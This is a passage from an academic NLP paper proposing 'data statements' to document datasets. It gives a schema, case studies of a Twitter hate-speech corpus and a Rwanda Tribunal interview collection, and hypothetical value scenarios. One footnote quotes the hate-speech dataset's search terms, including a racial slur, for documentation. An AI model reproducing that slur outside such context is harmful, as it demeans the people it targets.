(FLaReNet; Calzolari et al. 2012) and the Text Encoding Initiative (TEI; Consortium 2008) prescribe metadata to publish with language re- sources, primarily to aid in the discoverability of such resources. FLaReNet also encourages doc- umentation of language resources. And yet, it is very rare to find detailed characterization of the speakers whose data is captured or the annotators 6Surveys of EACL 2009 (Bender, 2011) and ACL 2015 (Munro, 2015) found 33%–81% of papers failed to name the language studied. (It always appeared to be English.) who provided the annotations, though the latter are usually characterized as being experts or crowd- workers.7 To fill this information gap, we argue that data statements should be included in every NLP pub- lication which presents new datasets and in the documentation of every NLP system, as part of a chronology of system development including de- scriptions of the various datasets for training, tun- ing and testing. Data statements should also be included in all NLP publications reporting exper- imental results. Accordingly, data statements will need to be both detailed and concise. To meet these competing goals, we propose two variants. For each dataset there should be a long-form ver- sion in an academic paper presenting the dataset or in system documentation. Research papers pre- senting experiments making use of datasets with existing long-form data statements should include shorter data statements and cite the longer one.8 We note another set of goals in competition: While readers need as much information as possi- ble in order to understand how the results can and cannot be expected to generalize, considerations of the privacy of the people involved (speakers, annotators) might preclude including certain kinds of information, especially with small groups. Each project will need to find the right balance, but this can be addressed in part by asking annotators and speakers for permission to collect and publish such information. 5 Proposed Data Statement Schema We propose the following schema of information to include in long and short form data statements. 5.1 Long form Long form data statements should be included in system documentation and in academic papers presenting new datasets, and should strive to pro- vide the following information: A. CURATION RATIONALE Which texts were in- cluded and what were the goals in selecting texts, both in the original collection and in any further 7A notable exception is Derczynski et al. (2016), who present a corpus of tweets collected to sample diverse speaker communities (location, type of engagement with Twitter), at diverse points in time (time of year, month, and day), and an- notated with named entity labels by crowdworker annotators from the same locations as the tweet authors. 8Older datasets can be retrofitted with citeable long-form data statements published on project web pages or archives. sub-selection? This can be especially important in datasets too large to thoroughly inspect by hand. An explicit statement of the curation rationale can help dataset users make inferences about what other kinds of texts systems trained with them could conceivably generalize to. B. LANGUAGE VARIETY Languages differ from each other in structural ways that can interact with NLP algorithms. Within a language, regional or social dialects can also show great variation (Chambers and Trudgill, 1998). The language and language variety should be described with: • A language tag from BCP-479 identifying the language variety (e.g. en-US or yue-Hant- HK) • A prose description of the language variety, glossing the BCP-47 tag and also providing further information (e.g. English as spoken in Palo Alto CA (USA) or Cantonese writ- ten with traditional characters by speakers in Hong Kong who are bilingual in Mandarin) C. SPEAKER DEMOGRAPHIC Sociolinguistics has found that variation (in pronunciation, prosody, word choice, and grammar) correlates with speaker demographic characteristics (Labov, 1966), as speakers use linguistic variation to con- struct and project identities (Eckert and Rickford, 2001). Transfer from native languages (L1) can affect the language produced by non-native (L2) speakers (Ellis, 1994, Ch. 8). A further impor- tant type of variation is disordered speech (e.g. dysarthria). Specifications include: • Age • Gender • Race/ethnicity • Native language • Socio-economic status • Number of different speakers represented • Presence of disordered speech D. ANNOTATOR DEMOGRAPHIC What are the demographic characteristics of the annotators and annotation guideline developers? Their own ‘so- cial address’ influences their experience with lan- guage and thus their perception of what they are annotating. Specifications include: • Age 9https://tools.ietf.org/rfc/bcp/bcp47. txt https://tools.ietf.org/rfc/bcp/bcp47.txt https://tools.ietf.org/rfc/bcp/bcp47.txt • Gender • Race/ethnicity • Native language • Socio-economic status • Training in linguistics/other relevant disci- pline E. SPEECH SITUATION Characteristics of the speech situation can affect linguistic structure and patterns at many levels. The intended audience of a linguistic performance can also affect linguistic choices on the part of speakers.10 The time and place provide broader context for understanding how the texts collected relate to their historical moment and should also be made evident in the data statement.11 Specifications include: • Time and place • Modality (spoken/signed, written) • Scripted/edited v. spontaneous • Synchronous v. asynchronous interaction • Intended audience F. TEXT CHARACTERISTICS Both genre and topic influence the vocabulary and structural char- acteristics of texts (Biber, 1995), and should be specified. G. RECORDING QUALITY For data that includes audio/visual recordings, indicate the quality of the recording equipment and any aspects of the recording situation that could impact recording quality. H. OTHER There may be other information of rel- evance as well (e.g. the demographic characteris- tics of the curators). As stated above, this is in- tended as a starting point and we anticipate best practices around writing data statements to de- velop over time. I. PROVENANCE APPENDIX For datasets built out of existing datasets, the data statements for the source datasets should be included as an appendix. 5.2 Short form Short form data statements should be included in any publication using a dataset for training, tuning or testing a system and may also be appropriate for certain kinds of system documentation. The short 10For example, people speak differently to close friends v. strangers, to small groups v. large ones, to children v. adults and to people v. machines (e.g. Ervin-Tripp 1964). 11Mutable speaker demographic information, such as age, is interpreted as relative to the time of the linguistic behavior. form data statement does not replace the long form one, but rather should include a pointer to it. For short form data statements, we envision 60–100 word summaries of the description included in the long form, covering most of the main points. 5.3 Summary We have outlined the kind of information data statements should include, addressing the needs laid out in §3, describing both long and short ver- sions. As the field gains experience with data statements, we expect to see a better understand- ing of what to include as well as best practices for writing data statements to emerge. Note that full specification of all of this infor- mation may not be feasible in all cases. For ex- ample, in datasets created from web text, precise demographic information may be unavailable. In other cases (e.g. to protect the privacy of annota- tors) it may be preferable to provide ranges rather than precise values. For the description of demo- graphic characteristics, our field can look to others for best practices, such as those described in the American Psychological Association’s Manual of Style. It may seem redundant to reiterate this informa- tion in every paper that makes use of well-trodden datasets. However, it is critical to consider the data anew each time to ensure that it is appropriate for the NLP work being undertaken and that the re- sults reported are properly contextualized. Note that the requirement is not that datasets be used only when there is an ideal fit between the dataset and the NLP goals but rather that the characteris- tics of the dataset be examined in relation to the NLP goals and limitations be reported as appro- priate. 6 Case studies We illustrate the idea of data statements with two cases studies. Ideally, data statements are written at or close to the time of dataset creation. These data statements were constructed post hoc in con- versation with the dataset curators. The first en- tails labels for a particular subset of all Twitter data. In contrast, the second entails all available data for an intentionally generated interview col- lection, including audiofiles and transcripts. Both illustrate how even when specific information is not available, the explicit statement of its lack of availability provides a more informative picture of the dataset. 6.1 Hate Speech Twitter Annotations The Hate Speech Twitter Annotations collection is a set of labels for ∼19,000 tweets collected by Waseem and Hovy (2016) and Waseem (2016). The dataset can be accessed via https:// github.com/zeerakw/hatespeech.12 A. CURATION RATIONALE In order to study the automatic detection of hate speech in tweets and the effect of annotator knowledge (crowd- workers v. experts) on the effectiveness of mod- els trained on the annotations, Waseem and Hovy (2016) performed a scrape of Twitter data using contentious terms and topics. The terms were cho- sen by first crowd-sourcing an initial set of search terms on feminist Facebook groups and then re- viewing the resulting tweets for terms to use and adding others based on the researcher’s intuition.13 Additionally, some prolific users of the terms were chosen and their timelines collected. For the an- notation work reported in Waseem (2016), expert annotators were chosen for their attitudes with re- spect to intersectional feminism in order to explore whether annotator understanding of hate speech would influence the labels and classifiers built on the dataset. B. LANGUAGE VARIETY The data was col- lected via the Twitter search API in late 2015. Information about which varieties of English are represented is not available, but at least Australian (en-AU) and US (en-US) mainstream Englishes are both included. C. SPEAKER DEMOGRAPHIC Speakers were not directly approached for inclusion in this dataset and thus could not be asked for demo- graphic information. More than 1500 different Twitter accounts are included. Based on indepen- dent information about Twitter usage and impres- sionistic observation of the tweets by the dataset curators, the data is likely to include tweets from 12This data statement was prepared based on information provided by Zeerak Waseem, pc, Feb-Apr 2018 and reviewed and approved by him. 13In a standalone data statement, the search terms should be given in the main text. To avoid accosting readers with slurs in this article, we instead list them in this footnote. Waseem and Hovy (2016) provide the following complete list of terms used in their initial scrape: ‘MKR’, ‘asian drive’, ‘feminazi’, ‘immigrant’, ‘nigger’, ‘sjw’, ‘WomenAgainst- Feminism’, ‘blameonenotall’, ‘islam terrorism’, ‘notallmen’, ‘victimcard’, ‘victim card’, ‘arab terror’, ‘gamergate’, ‘jsil’, ‘racecard’, ‘race card’. both younger (18–30) and older (30+) adult speak- ers, the majority of whom likely identify as white. No direct information is available about gender distribution or socioeconomic status of the speak- ers. It is expected that most, but not all, of the speakers speak English as a native language. D. ANNOTATOR DEMOGRAPHIC This dataset includes annotations from both crowdworkers and experts. 1,065 crowdworkers were recruited through Crowd Flower, primarily from Europe, South America and North America. Beyond coun- try of residence, no further information is avail- able about the crowdworkers. The expert anno- tators were recruited specifically for their under- standing of intersectional feminism. All were in- formally trained in critical race theory and gender studies through years of activism and personal re- search. They ranged in age from 20–40, included 3 men and 13 women, and gave their ethnicity as white European (11), East Asian (2), Middle East/Turkey (2), and South Asian (1). Their na- tive languages were Danish (12), Danish/English (1), Turkish/Danish (1), Arabic/Danish (1), and Swedish (1). Based on income levels, the expert annotators represented upper lower class (5), mid- dle class (7), and upper middle class (2). E. SPEECH SITUATION All tweets were ini- tially published between April 2013 and Decem- ber 2015. Tweets represent informal, largely asyn- chronous, spontaneous, written language, of up to 140 characters per tweet. About 23% of the tweets were in reaction to a specific Australian TV show (My Kitchen Rules) and so were likely meant for roughly synchronous interaction with other view- ers. The intended audience of the tweets was ei- ther other viewers of the same show, or simply the general Twitter audience. For the tweets contain- ing racist hate speech, the authors appear to intend them both for those who would agree but also for people whom they hope to provoke into having an agitational and confrontational exchange. F. TEXT CHARACTERISTICS For racist tweets the topic was dominated by Islam and Islamopho- bia. For sexist tweets predominant topics were the TV show and people making sexist statements while claiming not to be sexist. The majority of tweets only used one modality (text) though some included links to pictures and websites. G. RECORDING QUALITY N/A. H. OTHER N/A. I. PROVENANCE APPENDIX N/A. https://github.com/zeerakw/hatespeech https://github.com/zeerakw/hatespeech Twitter Hate Speech short form This dataset includes labels for ∼19,000 English tweets from different locales (Australia and North America be- ing well-represented) selected to contain a high prevalence of hate speech. The labels indicate the presence and type of hate speech and were pro- vided both by experts (mostly with extensive if informal training in critical race theory and gen- der studies and English as a second language) and by crowdworkers primarily from Europe and the Americas. [Include a link to the long form.] 6.2 Voices from the Rwanda Tribunal (VRT) Voices from the Rwanda Tribunal is a collec- tion of 49 video interviews in English and French with personnel from the International Criminal Tribunal for Rwanda (ICTR) comprising 50-60 hours of material with high quality transcrip- tion throughout (Nathan et al., 2011; Nilsen et al., 2012; Friedman et al., 2016). The dataset can be downloaded from http://www. tribunalvoices.org.14 A. CURATION RATIONALE The VRT project, funded by the United States National Science Foundation, is part of a research program on de- veloping multi-lifespan design knowledge (Fried- man and Nathan, 2010). It is independent from the ICTR, the United Nations, and the government of Rwanda. To help ensure accuracy and guard against breeches of confidentiality, interviewees had an opportunity to review and redact any ma- terial that was either misspoken or revealed con- fidential information. A total of two words have been redacted. No other review or redaction of content has occurred. The dataset includes all pub- licly released material from the collection; as of the writing of this data statement (28 September 2017) one interview and a portion of a second are currently sealed. B. LANGUAGE VARIETY Of the interviews, 44 are conducted in English (en-US and international English on the part of the interviewees, en-US on the part of the interviewers) and 5 in French and English, with the interviewee speaking inter- national French, the interviewer speaking English (en-US) and an interpreter speaking both.15 C. SPEAKER DEMOGRAPHIC The interviewees (13 women and 36 men, all adults) are profession- 14This data statement was prepared based on information provided by co-author Batya Friedman. 15At the end of one interview, there is 38 seconds of un- transcribed speech in Kinyarwanda (rw). als working in the area of international justice, such as judges or prosecutors, and support roles of the same, such as communications, prison war- den, and librarian. They represent a variety of na- tionalities: Argentina, Benin, Cameroon, Canada, England, The Gambia, Ghana, Great Britain, In- dia, Italy, Kenya, Madagascar, Mali, Morocco, Nigeria, Norway, Peru, Rwanda, Senegal, South Africa, Sri Lanka, St. Kitts and Nevis, Sweden, Tanzania, Togo, Uganda, and the US. Their native languages are not known, but are presumably di- verse. The 7 interviewers (2 women and 5 men) are informataion and legal professionals from dif- ferent regions in the US. All are native speakers of US English, all are white, and at the time of the interviews they ranged in age from early 40s to late 70s. The interpreters are language profes- sionals employed by the ICTR with experience in- terpreting between French and English. Their age, gender, and native languages are unknown. D. ANNOTATOR DEMOGRAPHIC The initial transcription was outsourced to a professional transcription company, so information about these transcribers is unavailable. The English tran- scripts were reviewed by English speaking (en- US) members of the research team for accuracy and then reviewed a third time by an additional English speaking (en-US) member of the team. The French/English transcripts received a sec- ond and third review for accuracy by bi-lingual French/English doctoral students at the University of Washington. Because of the sensitivity of the topic, the high political status of some intervie- wees (e.g. Prosecutor for the tribunal), and the in- ternational stature of the institution, it is very im- portant that interviewees’ comments be accurately transcribed. Accordingly, the bar for quality of transcription was set extremely high. E. SPEECH SITUATION The interviews were conducted in Autumn 2008 at the ICTR in Arusha, Tanzania and in Rwanda, face-to-face, as spoken language. The interviewers begin with a prepared set of questions, but most of the interaction is semi-structured. Most generally, the speech situa- tion can be characterized as a dialogue, but some of the interviewees give long replies, so stretches may be better characterized as monologues. For the interviewees, the immediate interlocutor is the interviewer, but the intended audience is much larger (see Part F below). http://www.tribunalvoices.org http://www.tribunalvoices.org F. TEXT CHARACTERISTICS The interviews were intended to provide an opportunity for tri- bunal personnel to reflect on their experiences working at the ICTR and what they would like to share with the people of Rwanda, the interna- tional justice community, and the global public now, 50 and 100 years from now. Professionals from all organs of the tribunal (judiciary, prosecu- tion, registry) were invited to be interviewed, with effort made to include a broad spectrum of roles (e.g. judges, prosecutor, defense counsel, but also the warden, librarian, language services). Intervie- wees expected their interviews to be made broadly accessible. G. RECORDING QUALITY The video inter- views were recorded with high definition equip- ment in closed but not sound-proof offices. There is some background noise. H. OTHER N/A I. PROVENANCE APPENDIX N/A. VRT short form The data represents well- vetted transcripts of 49 spoken interviews with personnel from the International Criminal Tri- bunal for Rwanda (ICTR) about their experience at the tribunal and reflections on international jus- tice, in international English (44 interviews) and French (5 interviews with interpreters). Intervie- wees are adults working in international justice and support fields at the ICTR; interviewers are adult information or legal professionals, highly fluent in en-US; and transcribers are highly edu- cated, highly fluent English and French speakers. [Include a link to the long form.] 6.3 Summary These sample data statements are meant to il- lustrate how the schema can be used to com- municate the specific characteristics of datasets. They were both created post-hoc, in communica- tion with the dataset curators. Once data state- ments are created as a matter of best practice, how- ever, they should be developed in tandem with the datasets themselves and may even inform the cu- ration of datasets. At the same time, data state- ments will need to be written for widely used, pre-existing datasets, where documentation may be lacking, memories imperfect, and dataset cu- rators no longer accessible. While retrospective data statements may be incomplete, by and large we believe they can still be valuable. Our case studies also underscore how curation rationales shape the specific kinds of texts in- cluded. This is particularly striking in the case of the Hate Speech Twitter Annotations, where the specific search terms very clearly shaped the spe- cific kinds of hate speech included and the ways in which any technology or studies built on this dataset will generalize. 7 A tool for mitigating bias We have explicitly designed data statements as a tool for mitigating bias in systems that use data for training and testing. Data statements are particu- larly well suited to mitigate forms of emergent and pre-existing bias. For the former, we see benefits at the level of specific systems and of the field: When a system is paired with data statement(s) for the data it is trained on, those deploying it are empowered to assess potential gaps between the speaker populations represented in the training and test data and the populations whose language the system will be working with. At the field level, data statements enable an examination of the en- tire catalog of testing and training datasets to help identify populations who are not yet included. All of these groups are vulnerable to emergent bias, in that any system would by definition have been trained and tested on data from datasets that do not represent them well. Data statements can also be instrumental in the diagnosis (and thus mitigation) of pre-existing bias. Consider again Speer’s (2017) example of Mexican restaurants and sentiment analysis. The information that the word vectors were trained on general web text (together with knowledge of what kind of societal biases such text might contain) was key in figuring out why the system consis- tently underestimated the ratings associated with reviews of Mexican restaurants. In order to en- able both more informed system development and deployment and audits by users and others of sys- tems in action, it is critical that characterizations of the training and test data underlying systems be available. To be clear, data statements do not in and of themselves solve the entire problem of bias. Rather, they are a critical enabling infrastructure. Consider by analogy this example from Friedman (1997) about access to technology and employ- ment for people with disabilities. In terms of computer system design, we are not so privileged as to determine rigidly the values that will emerge from the systems we design. But neither can we abdicate responsibility. For example, let us for the moment agree [. . . ] that disabled people in the work place should be able to access technology, just as they should be able to access a public build- ing. As system designers we can make the choice to try to construct a tech- nological infrastructure which disabled people can access. If we do not make this choice, then we single-handedly un- dermine the principle of universal ac- cess. But if we do make this choice, and are successful, disabled people would still rely, for example, on employers to hire them. (p.3) Similarly, with respect to bias in NLP technology, if we do not make a commitment to data state- ments or a similar practice for making explicit the characteristics of datasets, then we will single- handedly undermine the field’s ability to address bias. In NLP, we expect proposals to come with some kind of evaluation. In this paper, we have demon- strated the substance and ‘writability’ of a data statement through two exemplars (§6). However, the positive effects of data statements that we an- ticipate (and negative effects we haven’t antici- pated) cannot be demonstrated and tested a priori, as their impact emerges through practice. Thus, we look to value sensitive design, which encour- ages us to consider what would happen if a pro- posed technology were to come into widespread use, over longer periods of time, with attention to a wide range of stakeholders, potential benefits, and harms (Friedman et al., 2006, 2017). We do this with value scenarios (Nathan et al., 2007; Czeskis et al., 2010). Specifically, we look at two kinds of value scenarios: Those concerning NLP technology that fails to take into account an appropriate match between training data and deployment con- text and those that envision possible positive as well as negative consequences stemming from the widespread use of the specific ‘technology’ we are proposing in this paper (data statements). Envi- sioning possible negative outcomes allows us to consider how to mitigate such possibilities before they occur. 7.1 Public health and NLP for social media This value scenario is inspired by Jurgens et al. (2017), who provide a similar one to motivate training language ID systems on more represen- tative datasets. Scenario. Big U Hospital in a town in the Up- per Midwest collaborates with the CS Department at Big U to create a Twitter-based early warning system for infectious disease, called DiseaseAlert. Big U Hospital finds that the system improves pa- tient outcomes by alerting hospital staff to emerg- ing community health needs and alerting physi- cians to test for infectious diseases that currently are active locally. Big U decides to make the DiseaseAlert project open source to provide similar benefits to hospi- tals across the Anglophone world and is delighted to learn that City Hospital in Abuja, Nigeria is ex- cited to implement DiseaseAlert locally. Big U supports City Hospital with installing the code, in- cluding localizing the system to draw on tweets posted from Abuja. Over time, however, City Hos- pital finds that the system is leading its physicians to order unnecessary tests and that it is not at all accurate in detecting local health trends. City Hos- pital complains to Big U about the poor system performance and reports that their reputation is be- ing damaged. Big U is puzzled, as the DiseaseAlert performs well in the Upper Midwest, and they had spent time localizing the system to use tweets from Abuja. After a good deal of frustration and in- vestigation into Big U’s system, the developers discover that the third-party language ID compo- nent they had included was trained on only highly- edited US and UK English text. As a result, it tends to misclassify tweets in regional or non- standard varieties of English as ‘not English’ and therefore not relevant. Most of the tweets posted by people living in Abuja that City Hospital’s sys- tem should have been looking at were thrown out by the system at the first step of processing. Analysis. City Hospital adopted Big U’s open source DiseaseAlert system in exactly the way Big U intended. However, the documentation for the language ID component lacked critical informa- tion needed to help ensure the localization process would be successful; namely, information about the training and test sets for the system. Had Big U included data statements for all system compo- nents (including third-party components) in their documentation, then City Hospital IT staff would have been positioned to recognize the potential limitation of DiseaseAlert and to work proactively with Big U to ensure the system performed well in City Hospital’s context. Specifically, in reviewing data statements for all system components, the IT staff could note that the language ID component was trained on data unlike what they were seeing in their local tweets and ask for a different lan- guage ID component or ask for the existing one to be retrained. In this manner, an emergent bias and its concomitant harms could have been iden- tified and addressed during the system adaptation process prior to deployment. 7.2 Toward an inclusive data catalog In §7.1 we consider data statements in relation to a particular system. Here, we explore their potential to enable better science in NLP overall. Scenario. It’s 2022 and ‘Data Statement’ has become a standard section heading for NLP re- search papers and system documentation. Hap- pily, reports of mismatch between dataset and community of application leading to biased sys- tems have decreased. Yet, research community members articulate an unease regarding which lan- guage communities are and which are not part of the field’s data catalog — the abstract total collec- tion of data and associated meta-data to which the field has access — and the possibility for resulting bias in NLP at a systemic level. In response, several national funding bodies jointly fund a project to discover gaps in knowl- edge. The project compares existing data state- ments to surveys of spoken languages and system- atically maps which language varieties have re- sources (annotated corpora and standard process- ing tools) and which ones lack such resources. The study turns up a large number of language varieties lacking such resources; it also produces a precise list of underserved populations, some of which are quite sizable, suggesting opportunity for impactful intervention at the academic, industry and govern- ment levels. Study results in hand, the NLP community em- barks on an intentional program to broaden the language varieties in the data catalog. Public dis- cussions lead to criteria for prioritizing language varieties and funding agencies come together to fund collaborative projects to produce state of the art resources for understudied languages. Over time, the data catalog becomes more inclusive; bias in the catalog, while not wholly absent, is sig- nificantly reduced and NLP researchers and devel- opers are able to run more comprehensive exper- iments and build technology that serves a larger portion of society. Analysis. The NLP community has recognized critical limitations in the field’s existing data cat- alog, leaving many language communities un- derserved (Bender, 2011; Munro, 2015; Jurgens et al., 2017).16 The widespread uptake of data statements positions the NLP community to docu- ment the degree to which it leaves out certain lan- guage groups and empower itself to systematically broaden the data catalog. In turn, individual NLP systems could be trained on datasets that more closely align with the language of anticipated sys- tem users, thereby averting emergent bias. Fur- thermore, NLP researchers can more thoroughly test key research ideas and systems, leading to more reliable scientific results. 7.3 Anticipating and mitigating barriers Finally, we explore one potential negative out- come and how with care it might be mitigated: that of data statements as a barrier to research. Scenario. In response to widespread uptake, in 2026 the Association for Computational Linguis- tics (ACL) proposes that data statements be stan- dardized and required components of research pa- pers. A standards committee is formed, open pub- lic professional discussion is engaged, and in 2028 a standard is adopted. It mandates data statements as a requirement for publication, with standard- ized information fields and strict specifications for how these should be completed to facilitate auto- mated meta-analysis. There is great hope that the field will experience increasing benefits from abil- ity to compare, contrast, and build complementary data sets. Many of those hopes are realized. However, in a relatively short period of time papers from un- derrepresented regions abruptly decline. In addi- tion, the number of papers from everywhere pro- ducing and reporting on new datasets decline as well. Distressed by this outcome, the ACL con- 16The EU-funded project META-NET worked on identi- fying gaps at the level of whole languages for Europe, pro- ducing a series of 32 white papers each concerning one European language, available from http://www.meta- net.eu/whitepapers/overview, accessed 6 August 2018 http://www.meta-net.eu/whitepapers/overview http://www.meta-net.eu/whitepapers/overview stitutes an ad hoc committee to investigate. A survey of researchers reveals two distinct causes: First, researchers from institutions not yet well represented at ACL were having their papers desk- rejected due to missing or insufficient data state- ments. Second, researchers who might otherwise have developed a new dataset instead chose to use existing datasets whose data statements could sim- ply be copied. In response, the ACL executive de- velops a mentoring service to assist authors in sub- mitting standards-compliant data statements and considers relaxing the standard somewhat in order to encourage more dataset creation. Analysis. With any new technology, there can be unanticipated ripple effects — data statements are no exception. Here we envision two poten- tial negative impacts, which could both be miti- gated through other practices. Importantly, while we recommend the practice of creating data state- ments, we believe that they should be widely used before any standardization takes place. Further- more, once a degree of expertise in this area is built up, we recommend that mentoring be put in place proactively. Community engagement and mentor- ing will also contribute to furthering ethical dis- course and practice in the field. 7.4 Summary The value scenarios described here point to key upsides to the widespread adoption of data state- ments and also help to provide words of caution. They are meant to be thought-provoking and plau- sible, but are not predictive. Importantly, the sce- narios illustrate how, if used well, data statements could be an effective tool for mitigating bias in NLP systems. 8 Related work We see three strands of related work which lend support to our proposal and to the proposition that data statements will have the intended effect: sim- ilar practices in medicine (§8.1), emerging, inde- pendent proposals around similar ideas for trans- parency about datasets in AI (§8.2), and proposals for ‘algorithmic impact statements’ (§8.3). 8.1 Guidelines for reporting medical trials In medicine, the CONSORT (CONsolidated Stan- dards of Reporting Trials) guidelines were devel- oped by a consortium of journal editors, specialists in clinical trial methodology and others to improve reporting of randomized, controlled trials.17 They include a checklist for authors to use to indicate where in their research reports each item is han- dled and a statement explaining the rationale be- hind each item (Moher et al., 2010). CONSORT development began in 1993, with the most recent release in 2010. It has been endorsed by 70 medi- cal journals.18 Item 4a, ‘Eligibility criteria for participants’ is most closely related to the concerns of this paper. Characterizing the population that participated in the study is critical for gauging the extent to which the results of the study are applicable to particu- lar patients a physician is treating (Moher et al., 2010). The inclusion of this information has also en- abled further kinds of research. For example, Mbuagbaw et al. (2017) argue that careful atten- tion to and publication of demographic data that may correlate with health inequities can facilitate further work through meta-analyses. In particu- lar, individual studies usually lack the statistical power to do the kind of sub-analyses required to check for health inequities, and failing to publish demographic information precludes its use in the kind of aggregated, meta-analyses that could have sufficient statistical power. This echoes the field- level benefits we anticipate for data statements in building out the data catalog in the value scenario in §7.2. 8.2 Converging proposals At least three other groups are working in parallel on similar proposals regarding bias and AI. Gebru et al. (in prep) propose ‘datasheets for datasets’, looking at AI more broadly (but including NLP); Chmielinski and colleagues at the MIT Media Lab propose ‘dataset nutrition labels’;19 and Yang et al. (2018) describe ‘Ranking Facts’, a series of wid- gets that allow a user to explore how attributes in- fluence a ranking. Of these, the datasheets pro- posal is most similar to ours in including a compa- rable schema. The datasheets are inspired by those used in computer hardware to give specifications, lim- 17http://www.consort-statement.org/ consort-2010, accessed July 12, 2017 18http://www.consort-statement.org/ about-consort/endorsement-of-consort- statement, accessed July 12, 2017 19http://datanutrition.media.mit.edu/, accessed April 2, 2018 http://www.consort-statement.org/consort-2010 http://www.consort-statement.org/consort-2010 http://www.consort-statement.org/about-consort/endorsement-of-consort-statement http://www.consort-statement.org/about-consort/endorsement-of-consort-statement http://www.consort-statement.org/about-consort/endorsement-of-consort-statement http://datanutrition.media.mit.edu/ its and appropriate use information for compo- nents. There is important overlap in the kinds of information called for in the datasheets schema and our data statement schema: For example, the datasheets schema includes a section on ‘Motiva- tion for Dataset Creation’, akin to our ‘Curation Rationale’. The primary differences stem from the fact that the datasheets proposal is trying to ac- commodate all types of datasets used to train ma- chine learning systems and, hence, tends toward more general, cross-cutting categories; while we elaborate requirements for linguistic datasets and, hence, provide more specific, NLP-focused cate- gories. Gebru et al. note, like us, that their pro- posal is meant as an initial starting point to be elaborated through adoption and application. Hav- ing multiple starting points for this discussion will certainly make it more fruitful. 8.3 Algorithmic impact statements Several groups have called for algorithmic im- pact statements (Shneiderman, 2016; Diakopou- los, 2016; AI Now Institute, 2018), modeled af- ter environmental impact statements. Of these AI Now’s proposal is perhaps the most developed. All three groups point to the need to clarify infor- mation about the data: “Algorithm impact state- ments would document [. . . ] data quality control for input sources” (Shneiderman, 2016, 13539); “One avenue for transparency here is to commu- nicate the quality of the data, including its accu- racy, completeness, and uncertainty, [. . . ] repre- sentativeness of a sample for a specific population, and assumptions or other limitations” (Diakopou- los, 2016, 60); “AIAs should cover [. . . ] input and training data.” (AI Now Institute, 2018) However, none of these proposals specify how to do so. Data statements fill this critical gap. 9 Recommendations for implementation Data statements are meant to be something practi- cal and concrete that NLP technologists can adopt as one tool for mitigating potential harms of the technology we develop. For this benefit to come about, data statements must be easily adopted. In addition, practical uptake will require coordinated effort at the level of the field. In this section we briefly consider possible costs to writers and read- ers of data statements, and then propose strategies for promoting uptake. The primary cost we see for writers is time: With the required information to hand, writing a data statement should take no more than 2–3 hours (based on our experience with the case studies). However, the time to collect the information will depend on the dataset. The more speakers and an- notators that are involved, the more time it may take to collect demographic information. This can be facilitated by planning ahead, before the cor- pus is collected. Another possible cost is that col- lecting demographic information may mean that projects previously not submitted to institutional review boards for approval must now be, at least for exempt status. This process itself can take time, but is valuable in its own right. A further cost to writers is space. We propose that data state- ments, even the short form (60 – 100 words), be exempt from page limits in conference and journal publications. As for readers, reviewers have more material to read and dataset (and ultimately system) users need to scrutinize data statements in order to deter- mine which datasets are appropriate for their use case. But this is precisely the point: Data state- ments make critical information accessible that previously could only be found by users with great effort, if at all. The time invested in scrutiniz- ing data statements prior to dataset adoption is expected to be far less than the time required to diagnose and retrofit an already deployed system should biases be identified. Turning to uptake in the field, NLP technolo- gists (both researchers and system developers) are key stakeholders of the technology of data state- ments. Practices that engage these stakeholders in the development and promotion of data statements will both promote uptake and ensure that the ulti- mate form data statements take are responsive to NLP technologists’ needs. Accordingly, we rec- ommend that one or more professional organiza- tions such as the Association for Computational Linguistics convene a working group on data state- ments. Such a working group would engage in several related sets of activities, which would collectively serve to publicize and cultivate the use of data statements: (i) Best practices A clear first step entails de- veloping best practices for how data statements are produced. This includes: steps to take before collecting a dataset to facilitate writing an infor- mative data statement; heuristics for writing con- cise and effective data statements; how to incorpo- rate material from institutional review board/ethics committee applications into the data statement schema; how to find an appropriate level of de- tail given privacy concerns, especially for small or vulnerable populations; and how to produce data statements for older datasets that predate this prac- tice. In doing this work, it may be helpful to distill best practices from other fields, such as medicine and psychology, especially around collecting de- mographic information. (ii) Training and support materials With best practices in place, the next step is providing train- ing and support materials for the field at large. We see several complementary strategies to undertake: Create a digital template for data statements; run tutorials at conferences; establish a mentoring net- work (see §7.3); and develop an on-line ‘how-to’ guide. (iii) Recommendations for field-level policies There are a number of field-level practices that the working group could explore to support the uptake and successful use of data statements. Funding agencies could require data statements to be in- cluded in data management plans; conferences and journals could not count data statements against page limits (similar to references) and eventually require short form data statements in submissions; conferences and journals could allocate additional space for data statements in publications; finally once data statements have been in use for a few years, a standardized form could be established. 10 Tech policy implications Transparency of datasets and systems is essential for preserving accountability and building more just systems (Kroll et al., 2017). Due process provides a critical case in point. In the United States, for example, due process requires that cit- izens who have been deprived of liberty or prop- erty by the government be afforded the opportu- nity to understand and challenge the government’s decision (Citron, 2008). Without data statements or something similar, governmental decisions that are made or supported by automated systems de- prive citizens of the ability to mount such a chal- lenge, undermining the potential for due process. In addition to challenging any specific decision by any specific system, there is a further concern about building systems that are broadly represen- tative and fair. Here too, data statements have much to contribute. As systems are being built, data statements enable developers and researchers to make informed choices about training sets and to flag potential underrepresented populations who may be overlooked or treated unfairly. Once sys- tems are deployed, data statements enable diag- nosis of systemic unfairness when it is detected in system performance. At a societal level, such transparency is necessary for government and ad- vocacy groups seeking to ensure protections and an inclusive society. If data statements turn out to be useful as an- ticipated, then the following implications for stan- dardization and tech policy likely ensue. Long-Form Data Statements Required in System Documentation. For academia, industry and gov- ernment, inclusion of long-form data statements as part of system documentation should be a require- ment. As appropriate, inclusion of long-form data statements should be a requirement for ISO and other certification. Even groups that are creating datasets that they don’t share (e.g. NSA) would be well advised to make internal data statements. Moreover, under certain legal circumstances, such groups may be required to share this information. Short-Form Data Statements Required for Aca- demic and Other Publication. For academic pub- lication in journals and conferences, inclusion of short-form data statements should be a require- ment for publication. As highlighted in §7.3, cau- tion must be exercised to ensure that this require- ment does not become a barrier to access for some researchers. These two recommendations will need to be im- plemented with care. We have already noted the potential barrier to access. Secrecy concerns may also arise in some situations, e.g., some groups may be willing to share datasets but not demo- graphic information, for fear of public relations backlash or to protect the safety of contributors to the dataset. That said, as consumers of datasets or products trained with them, NLP researchers, developers and the general public would be well advised to use systems only if there is access to the information we propose should be included in data statements. 11 Conclusion and future work As researchers and developers working on tech- nology in widespread use, capable of impacting people beyond its direct users, we have an obli- gation to consider the ethical implications of our work. This will only happen reliably if we find ways to integrate such thought into our regular practice. In this paper, we have put forward one specific, concrete proposal which we believe will help with issues related to exclusion and bias in language technology: the practice of including ‘data statements’ in all publications and documen- tation for all NLP systems. We believe this practice will have beneficial ef- fects immediately and into the future: In the short term, it will foreground how our data does and doesn’t represent the world (and the people our systems will impact). In the long 